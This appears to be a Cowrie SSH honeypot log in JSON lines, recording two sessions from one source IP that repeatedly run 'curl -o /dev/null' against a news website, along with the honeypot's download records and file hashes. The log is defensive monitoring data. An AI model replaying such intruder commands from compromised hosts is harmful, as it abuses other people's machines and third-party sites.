{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:38.392782Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:38.416974Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:38.417982Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:38.429591Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:38.430538Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:38.450022Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:38.452605Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:38.453620Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:38.463596Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:38.471184Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:38.472155Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:38.493436Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:38.494736Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:38.495822Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:38.512879Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:38.513949Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:38.537443Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:38.539047Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:38.540182Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:38.568448Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:38.580055Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:38.581151Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:38.583223Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:38.584272Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:38.622271Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:38.623326Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:38.626331Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:38.627136Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:38.654051Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:38.660632Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:38.661557Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:38.664005Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:38.664975Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:38.699060Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:38.700358Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:38.702644Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:38.703853Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:38.705679Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:38.722776Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:38.734686Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:38.735710Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:38.755966Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:38.757459Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:38.760236Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:38.770507Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:38.782574Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:38.791338Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:38.792373Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:38.797526Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:38.798457Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:38.827641Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:38.829857Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:38.837254Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:38.838938Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:38.865550Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:38.866604Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:38.876498Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:38.877522Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:38.902956Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:38.904055Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:38.917206Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:38.918322Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:38.939504Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:38.940490Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:38.956622Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:38.957592Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:38.974821Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:38.975760Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:38.996014Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:38.997084Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:39.009593Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.010485Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:39.036832Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.037891Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:39.047174Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.048136Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:39.079616Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.080331Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:39.085205Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.086448Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.098555Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.100304Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.103519Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.108864Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.118290Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:39.120053Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.121176Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.125792Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:39.128146Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.129177Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:39.160047Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.161807Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:39.166888Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.167880Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:39.203219Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.204316Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:39.208666Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.209780Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:39.244506Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.245507Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:39.253017Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:39.254088Z","src_ip":"212.227.125.160","session":"7541ed730449"}
